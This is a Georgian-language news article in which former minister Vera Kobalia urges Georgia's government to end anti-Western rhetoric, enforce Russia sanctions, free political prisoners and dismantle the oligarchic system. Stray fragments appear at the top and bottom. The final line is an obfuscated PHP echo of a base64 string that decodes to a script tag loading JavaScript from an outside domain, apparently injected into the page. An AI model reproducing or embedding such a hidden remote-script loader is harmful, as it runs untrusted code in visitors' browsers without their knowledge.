celsiusi
ავერსი შნაიდერი

2010-2012 წლებში საქართველოს ეკონომიკისა და მდგრადი განვითარების მინისტრის და ამჟამად კანადის მთავრობის მრჩევლის ვერა ქობალიას შეფასებით, საქართველოს ხელისუფლებამ ისე აქცია ზურგი ევროპას და ამერიკას, რომ შეცდომების გამოსწორება რთული იქნება.

ასე უპასუხა მან BMGთV-ის გადაცემა „წერტილში“ წამყვანის კითხვას - რა რჩევებს მისცემდა დღეს საქართველოს მთავრობას.

ვერა ქობალიამ რამდენიმე მიმართულება გამოყო, რაზეც მისი აზრით, ხელისუფლებას სამუშაო აქვს. მათ შორისაა ანტიდასავლური რიტორიკის შეცვლა, რუსეთის წინააღმდეგ დაწესებული სანქციებისადმი ერთგულება, პოლიტიკური პატიმრების გათავისუფლება და ოლიგარქიული სისტემის დაშლა.

„იმისთვის, რომ საქართველოს ჰქონდეს შანსი, გახდეს ევროპის ნაწილი, პირველ რიგში, აუცილებელია, პოლიტიკური პატიმრების გათავისუფლება, რადგან ამას ითხოვენ ჩვენი დასავლელი პარტნიორები. ეს არის ძალიან მნიშვნელოვანი, რათა სტრატეგიულმა მეგობრებმაც დაინახონ, რომ სასამართლო სისტემის გაჯანსაღება ხდება... სამწუხაროდ, აშშ-ის მიერ ქართველი მოსამართლეების სანქცირებას ადეკვატური რეაქციები არ მოჰყვა.

სამწუხაროა, რუსეთზე დაწესებული სანქციების გვერდის ავლის რისკებზე ამერიკის შეერთებული შტატების სახელმწიფო დეპარტამენტის სანქციების კოორდინატორის ჯეიმს ო’ბრაიანის განცხადება, რომ საქართველო იმ ქვეყნებს შორისაა, რომელიც რეექსპორტით რუსეთში საქონელს ატარებს და ეხმარება რუსეთის ეკონომიკას, რაც ნიშნავს ბრძოლას უკრაინის წინააღმდეგ; რა თქმა უნდა, ამ მხრივაც უნდა გადაიდგას ნაბიჯები...

და ბოლოს, რაც ყველაზე მნიშვნელოვანია, ეს ყველაფერი რომ გამოსწორდეს უნდა დაიშალოს ოლიგარქიული სისტემა და მთავრობა. იმედი მაქვს, რომ ოპოზიცია გაერთიანდება და შემდეგ არჩევნებზე ერთად დადგებიან“, - თქვა ვერა ქობალიამ.

314
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");